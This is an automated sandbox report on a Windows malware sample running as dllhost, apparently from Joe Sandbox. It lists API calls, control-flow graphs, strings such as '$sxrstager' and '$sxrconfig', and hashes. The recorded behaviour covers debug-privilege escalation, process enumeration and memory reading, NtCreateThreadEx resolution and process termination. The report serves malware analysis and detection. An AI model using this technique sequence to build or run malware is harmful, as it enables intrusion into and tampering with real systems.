                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 140001014-140001043 GetCurrentProcessId OpenProcess 1 140001045-140001059 OpenProcessToken 0->1 2 1400010bd-1400010e5 RegOpenKeyExW 0->2 5 1400010b4-1400010b7 CloseHandle 1->5 6 14000105b-140001070 LookupPrivilegeValueW 1->6 3 1400010e7-1400010f2 RegDeleteValueW 2->3 4 1400010f8-140001124 SysAllocString * 2 CoInitializeEx 2->4 3->4 7 140001241-140001282 SysFreeString * 2 GetProcessHeap HeapAlloc call 140001368 4->7 8 14000112a-140001166 CoInitializeSecurity 4->8 5->2 6->5 9 140001072-1400010ac AdjustTokenPrivileges 6->9 17 1400012d4-140001317 GetProcessHeap HeapFree RtlDeleteBoundaryDescriptor HeapAlloc call 140001368 7->17 18 140001284-140001289 7->18 11 140001173-14000119d CoCreateInstance 8->11 12 140001168-14000116d 8->12 9->5 13 1400010ae GetLastError 9->13 15 14000123b CoUninitialize 11->15 16 1400011a3-1400011fb VariantInit 11->16 12->11 12->15 13->5 15->7 24 140001231-140001235 16->24 25 1400011fd-140001215 16->25 26 140001342-140001365 GetProcessHeap HeapFree 17->26 27 140001319-14000131e 17->27 18->17 19 14000128b-14000128e 18->19 23 140001290-140001299 19->23 28 1400012ca-1400012d2 23->28 29 14000129b-14000129e 23->29 24->15 25->24 35 140001217-14000122b 25->35 27->26 30 140001320-140001323 27->30 28->17 28->23 29->28 31 1400012a0-1400012b4 OpenProcess 29->31 33 140001325-14000132e 30->33 31->28 34 1400012b6-1400012c4 TerminateProcess CloseHandle 31->34 36 140001338-140001340 33->36 37 140001330-140001333 call 14000155c 33->37 34->28 35->24 36->26 36->33 37->36
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Heap$AllocFreeOpenString$CloseDeleteHandleInitializeTokenValue$AdjustBoundaryCreateCurrentDescriptorErrorInitInstanceLastLookupPrivilegePrivilegesSecurityTerminateUninitializeVariant
                                                                                                                      • String ID: $sxrstager$$sxrsvc64$SOFTWARE$SeDebugPrivilege
                                                                                                                      • API String ID: 1045860391-566595606
                                                                                                                      • Opcode ID: 33545f7b093bffa7e6d6e68f596167ee68986d03797a0cce563c85867658168a
                                                                                                                      • Instruction ID: 783fc730cd4673971968b08ac741f1a1a7a0f0db785b3f54083c1a857c08c9a6
                                                                                                                      • Opcode Fuzzy Hash: 33545f7b093bffa7e6d6e68f596167ee68986d03797a0cce563c85867658168a
                                                                                                                      • Instruction Fuzzy Hash: 60A117B2700B4586EB16CF66F8543E923A5FB8DB89F448125EF0E47AA5DF38D549C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFree$BoundaryCloseDeleteDescriptorHandleMemoryModulesOpenProcessesRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4093845160-0
                                                                                                                      • Opcode ID: 5c9e6c8d196d291886fbe90ea79c47c3ea45cb56a21c54cb6fbac88e5fb9df12
                                                                                                                      • Instruction ID: 0c4118f11d38248736db898342297cfd33e1e7ee26b5e3befa791c7e9a42177d
                                                                                                                      • Opcode Fuzzy Hash: 5c9e6c8d196d291886fbe90ea79c47c3ea45cb56a21c54cb6fbac88e5fb9df12
                                                                                                                      • Instruction Fuzzy Hash: 58514AB2611B818AEB66DF63B8587DA22A1F78DBC4F444025EF4A5B764DF38C545C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 57 140000231-140001011 ExitProcess
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: 7ac854e1e7e6dbe7a1b520466d2429235592816ec396c733cc4186b22ad55d33
                                                                                                                      • Instruction ID: 71e4820d4104f39f37cf17a5aebe01a9dbe568c608f41c0cf1242f6b27dbe954
                                                                                                                      • Opcode Fuzzy Hash: 7ac854e1e7e6dbe7a1b520466d2429235592816ec396c733cc4186b22ad55d33
                                                                                                                      • Instruction Fuzzy Hash: 84E0426350E3C10FC7038B74586419C3FB09796A50B8EC59BC385C3383C61C5409C312
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 58 140001000-140001011 call 140001014 ExitProcess
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0000000140001014: GetCurrentProcessId.KERNEL32 ref: 0000000140001027
                                                                                                                        • Part of subcall function 0000000140001014: OpenProcess.KERNEL32 ref: 0000000140001037
                                                                                                                        • Part of subcall function 0000000140001014: OpenProcessToken.ADVAPI32 ref: 0000000140001051
                                                                                                                        • Part of subcall function 0000000140001014: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140001068
                                                                                                                        • Part of subcall function 0000000140001014: AdjustTokenPrivileges.ADVAPI32 ref: 00000001400010A4
                                                                                                                        • Part of subcall function 0000000140001014: GetLastError.KERNEL32 ref: 00000001400010AE
                                                                                                                        • Part of subcall function 0000000140001014: CloseHandle.KERNEL32 ref: 00000001400010B7
                                                                                                                        • Part of subcall function 0000000140001014: RegOpenKeyExW.ADVAPI32 ref: 00000001400010DD
                                                                                                                        • Part of subcall function 0000000140001014: RegDeleteValueW.ADVAPI32 ref: 00000001400010F2
                                                                                                                        • Part of subcall function 0000000140001014: SysAllocString.OLEAUT32 ref: 00000001400010FF
                                                                                                                        • Part of subcall function 0000000140001014: SysAllocString.OLEAUT32 ref: 000000014000110F
                                                                                                                        • Part of subcall function 0000000140001014: CoInitializeEx.OLE32 ref: 000000014000111C
                                                                                                                        • Part of subcall function 0000000140001014: CoInitializeSecurity.OLE32 ref: 0000000140001156
                                                                                                                        • Part of subcall function 0000000140001014: CoCreateInstance.OLE32 ref: 0000000140001195
                                                                                                                        • Part of subcall function 0000000140001014: VariantInit.OLEAUT32 ref: 00000001400011A7
                                                                                                                      • ExitProcess.KERNEL32 ref: 000000014000100B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Open$AllocInitializeStringTokenValue$AdjustCloseCreateCurrentDeleteErrorExitHandleInitInstanceLastLookupPrivilegePrivilegesSecurityVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 767316500-0
                                                                                                                      • Opcode ID: 744f39d44c6e1cf923b69681ca2190275410b93513addb8cd57da560c05945df
                                                                                                                      • Instruction ID: 146724fef438b737ed00828a951e49ec2c44f6708d9892ddea2fdd56566e6da4
                                                                                                                      • Opcode Fuzzy Hash: 744f39d44c6e1cf923b69681ca2190275410b93513addb8cd57da560c05945df
                                                                                                                      • Instruction Fuzzy Hash: 65A011B0A00280A2EA0AFBB2388A3C800200B88380F000808A30A832B3CE3C00C88220
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 61 140001648-140001661 GetModuleHandleA 62 140001663-14000166a GetProcAddress 61->62 63 140001670-140001674 61->63 62->63
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                                      • API String ID: 1646373207-690569937
                                                                                                                      • Opcode ID: 765a30b2bbc0babb255d7f809e438350524f6181367cf5a0d3374a3ce406139f
                                                                                                                      • Instruction ID: 1f1ac530e8d7bc586301703381b49fd6cf30065bcfbc8e8d092ce1a2171d6dbf
                                                                                                                      • Opcode Fuzzy Hash: 765a30b2bbc0babb255d7f809e438350524f6181367cf5a0d3374a3ce406139f
                                                                                                                      • Instruction Fuzzy Hash: 5CD0E9F4612A41D1EA0BEF57FC593D512616B9C7C5F854461A70A43271DE3C859AC710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                                      • GetLastError.KERNEL32 ref: 004013B6
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004013C5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$OpenToken$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2574353748-2896544425
                                                                                                                      • Opcode ID: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                                      • Instruction ID: e2a5f4244efd0fdb54eb2fb8bae3e68f4838b917bcc28da7506a6e19d6301c26
                                                                                                                      • Opcode Fuzzy Hash: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                                      • Instruction Fuzzy Hash: C101CC75901619AFE7009BA49E89BAF77BCEB04745F004435BA01F22D1D7B49E44CB68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                                      • K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004011EB
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040120C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00401212
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00401219
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4084875642-0
                                                                                                                      • Opcode ID: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                                      • Instruction ID: da445f777c3a34a6d199b0584eba223951ce35d7d1b72319c39e632b78911c99
                                                                                                                      • Opcode Fuzzy Hash: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                                      • Instruction Fuzzy Hash: 8A513075D00219ABDB14DFD5CE84AAFBBB8FF0D300F10446AE645BB290D7789A41CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • #2.OLEAUT32($sxrsvc32), ref: 004013E7
                                                                                                                      • #2.OLEAUT32(00402114), ref: 004013F1
                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000), ref: 004013FA
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401414
                                                                                                                      • CoCreateInstance.OLE32(00402098,00000000,00000001,00402088,?), ref: 0040143F
                                                                                                                      • #8.OLEAUT32(?), ref: 00401451
                                                                                                                      • CoUninitialize.OLE32 ref: 004014DE
                                                                                                                      • #6.OLEAUT32(?), ref: 004014F0
                                                                                                                      • #6.OLEAUT32(00000000), ref: 004014F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize$CreateInstanceSecurityUninitialize
                                                                                                                      • String ID: $sxrsvc32
                                                                                                                      • API String ID: 374467530-78464866
                                                                                                                      • Opcode ID: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                                      • Instruction ID: 8a654483f6148525abe5e909ff2a9399e1f522979beb927b6318c92976265d17
                                                                                                                      • Opcode Fuzzy Hash: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                                      • Instruction Fuzzy Hash: 55415271E00218AFDB00DFA9CD899AF7BBDEF45354B100069F905FB1A0C6B5AD05CBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040133E: GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                                        • Part of subcall function 0040133E: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                                        • Part of subcall function 0040133E: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                                        • Part of subcall function 0040133E: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                                        • Part of subcall function 0040133E: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                                        • Part of subcall function 0040133E: GetLastError.KERNEL32 ref: 004013B6
                                                                                                                        • Part of subcall function 0040133E: CloseHandle.KERNEL32(00000000), ref: 004013C5
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                                      • RegDeleteValueW.ADVAPI32(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Heap$Open$TokenValue$AdjustAllocCloseCurrentDeleteErrorFreeHandleLastLookupPrivilegePrivileges
                                                                                                                      • String ID: $sxrstager$SOFTWARE
                                                                                                                      • API String ID: 2684971006-1606840681
                                                                                                                      • Opcode ID: 4c570abea0792dd94860d043fe7cf1b7caeabb8fc4f27b3d0c74d9b7923a3ab5
                                                                                                                      • Instruction ID: e2b15fd1bdb0af68db2fceded59578336af26d801dc78018de8527ed98e595ed
                                                                                                                      • Opcode Fuzzy Hash: 4c570abea0792dd94860d043fe7cf1b7caeabb8fc4f27b3d0c74d9b7923a3ab5
                                                                                                                      • Instruction Fuzzy Hash: B401A531B00310BBE7107BF59E4EB6F776D9B44705F00043AF706F62E2DAB89A418658
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040129E
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012A5
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                                        • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                                        • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                                        • Part of subcall function 00401081: K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                                        • Part of subcall function 00401081: OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                                        • Part of subcall function 00401081: K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                                        • Part of subcall function 00401081: ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                                        • Part of subcall function 00401081: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004011EB
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                                        • Part of subcall function 00401081: HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040120C
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012E3
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012F3
                                                                                                                      • CloseHandle.KERNEL32(000003E8,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012FC
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040130F
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 00401316
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1323846700-0
                                                                                                                      • Opcode ID: f8e2dd12d7d8159a1779e005bd96ddce77076a082f3154ee3cacccf03337a804
                                                                                                                      • Instruction ID: ab2b09c8b71ca9c99a709ec0924a6b803fad294693bd42ca56058f473aaebc13
                                                                                                                      • Opcode Fuzzy Hash: f8e2dd12d7d8159a1779e005bd96ddce77076a082f3154ee3cacccf03337a804
                                                                                                                      • Instruction Fuzzy Hash: B601C071A00301ABEB116BE48F0DB5F77A8EB04712F144136EA05B22E1DBB88D40C768
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,SOFTWARE\$sxrconfig,00000000,000F013F,000003E8,?,00000000), ref: 00401022
                                                                                                                      • RegDeleteKeyW.ADVAPI32(000003E8,?,?,00000000), ref: 00401038
                                                                                                                      • RegEnumKeyExW.ADVAPI32(000003E8,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00401058
                                                                                                                      • RegCloseKey.ADVAPI32(000003E8,?,00000000), ref: 00401065
                                                                                                                      • RegDeleteKeyExW.ADVAPI32(?,SOFTWARE\$sxrconfig,000F013F,00000000,?,00000000), ref: 00401077
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Delete$CloseEnumOpen
                                                                                                                      • String ID: SOFTWARE\$sxrconfig
                                                                                                                      • API String ID: 3013565938-435319591
                                                                                                                      • Opcode ID: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                                      • Instruction ID: d544ddb297f42690969b4a203d904ba38e423bc2ba9d9ccdcf6cbbeeb35745ab
                                                                                                                      • Opcode Fuzzy Hash: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                                      • Instruction Fuzzy Hash: CD011271500288FBD7609B92DE4DEAB7ABCEBC5741F10007AB605F10A0DB745E44DA35
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,00401271,000003E8,001FFFFF,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00401593), ref: 00401324
                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00401334
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                                      • API String ID: 1646373207-690569937
                                                                                                                      • Opcode ID: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                                      • Instruction ID: d003ae9fd3514cd023d1297aa5e823454f89fcb9fe9eff1a1c2077655f61d9ec
                                                                                                                      • Opcode Fuzzy Hash: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                                      • Instruction Fuzzy Hash: 63C09270B423009AEE102B715F0DF0B3A686A40B42B1448B3B609F05E4DAFCC484D52C
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1%
                                                                                                                      Dynamic/Decrypted Code Coverage:88%
                                                                                                                      Signature Coverage:8.4%
                                                                                                                      Total number of Nodes:502
                                                                                                                      Total number of Limit Nodes:6
                                                                                                                      execution_graph 15620 1a00bdba608 15621 1a00bdba621 15620->15621 15630 1a00bdba61d 15620->15630 15632 1a00bdbccd8 15621->15632 15626 1a00bdba633 15628 1a00bdbb978 __free_lconv_mon 4 API calls 15626->15628 15628->15630 15633 1a00bdba626 15632->15633 15634 1a00bdbcce5 15632->15634 15638 1a00bdbd1d0 GetEnvironmentStringsW 15633->15638 15672 1a00bdbb39c 15634->15672 15639 1a00bdbd2a0 15638->15639 15640 1a00bdbd1fe 15638->15640 15641 1a00bdbd2aa FreeEnvironmentStringsW 15639->15641 15642 1a00bdba62b 15639->15642 15643 1a00bdbd120 WideCharToMultiByte 15640->15643 15641->15642 15642->15626 15650 1a00bdba674 15642->15650 15644 1a00bdbd250 15643->15644 15644->15639 15645 1a00bdbaeac 4 API calls 15644->15645 15646 1a00bdbd25f 15645->15646 15647 1a00bdbd289 15646->15647 15648 1a00bdbd120 WideCharToMultiByte 15646->15648 15649 1a00bdbb978 __free_lconv_mon 4 API calls 15647->15649 15648->15647 15649->15639 15651 1a00bdba69b 15650->15651 15652 1a00bdbb900 _set_errno_from_matherr 4 API calls 15651->15652 15661 1a00bdba6d0 15652->15661 15653 1a00bdba73f 15654 1a00bdbb978 __free_lconv_mon 4 API calls 15653->15654 15655 1a00bdba640 15654->15655 15667 1a00bdbb978 15655->15667 15656 1a00bdbb900 _set_errno_from_matherr 4 API calls 15656->15661 15657 1a00bdba730 16126 1a00bdba77c 15657->16126 15661->15653 15661->15656 15661->15657 15662 1a00bdba767 15661->15662 15665 1a00bdbb978 __free_lconv_mon 4 API calls 15661->15665 16117 1a00bdbabd4 15661->16117 15664 1a00bdbb7e0 _invalid_parameter_noinfo 12 API calls 15662->15664 15663 1a00bdbb978 __free_lconv_mon 4 API calls 15663->15653 15666 1a00bdba779 15664->15666 15665->15661 15668 1a00bdbb97d HeapFree 15667->15668 15669 1a00bdbb9af 15667->15669 15668->15669 15670 1a00bdbb998 15668->15670 15669->15626 15671 1a00bdbb8e0 _set_errno_from_matherr 3 API calls 15670->15671 15671->15669 15673 1a00bdbb3ad 15672->15673 15676 1a00bdbb3ba 15673->15676 15713 1a00bdbd6a8 15673->15713 15675 1a00bdbb3d1 15675->15676 15716 1a00bdbb900 15675->15716 15681 1a00bdbb434 15676->15681 15724 1a00bdbac34 15676->15724 15695 1a00bdbca60 15681->15695 15682 1a00bdbb402 15684 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15682->15684 15683 1a00bdbb3f2 15685 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15683->15685 15686 1a00bdbb40a 15684->15686 15687 1a00bdbb3f9 15685->15687 15688 1a00bdbb40e 15686->15688 15689 1a00bdbb420 15686->15689 15692 1a00bdbb978 __free_lconv_mon 4 API calls 15687->15692 15691 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15688->15691 15720 1a00bdbb034 15689->15720 15691->15687 15692->15676 15694 1a00bdbb978 __free_lconv_mon 4 API calls 15694->15676 15977 1a00bdbcc20 15695->15977 15697 1a00bdbca89 15988 1a00bdbc76c 15697->15988 15701 1a00bdbcb4f 15702 1a00bdbb978 __free_lconv_mon 4 API calls 15701->15702 15704 1a00bdbcaa3 15702->15704 15704->15633 15707 1a00bdbcb4a 15708 1a00bdbb8e0 _set_errno_from_matherr 4 API calls 15707->15708 15708->15701 15709 1a00bdbcbac 15709->15701 16010 1a00bdbc5b0 15709->16010 15710 1a00bdbcb6f 15710->15709 15711 1a00bdbb978 __free_lconv_mon 4 API calls 15710->15711 15711->15709 15732 1a00bdbd36c 15713->15732 15715 1a00bdbd6d6 __vcrt_freeptd 15715->15675 15717 1a00bdbb911 _set_errno_from_matherr 15716->15717 15719 1a00bdbb3e4 15717->15719 15739 1a00bdbb8e0 15717->15739 15719->15682 15719->15683 15721 1a00bdbb0e6 _set_errno_from_matherr 15720->15721 15762 1a00bdbaf8c 15721->15762 15723 1a00bdbb0fb 15723->15676 15723->15694 15725 1a00bdbac3d 15724->15725 15726 1a00bdbac4c 15725->15726 15882 1a00bdbdcf8 15725->15882 15728 1a00bdbac55 IsProcessorFeaturePresent 15726->15728 15730 1a00bdbac7f 15726->15730 15729 1a00bdbac64 15728->15729 15898 1a00bdbb5ac 15729->15898 15735 1a00bdbd3cd 15732->15735 15736 1a00bdbd3c8 try_get_function 15732->15736 15733 1a00bdbd3fc LoadLibraryExW 15733->15736 15734 1a00bdbd4be GetProcAddress 15734->15735 15735->15715 15736->15733 15736->15735 15737 1a00bdbd4b0 15736->15737 15738 1a00bdbd457 LoadLibraryExW 15736->15738 15737->15734 15737->15735 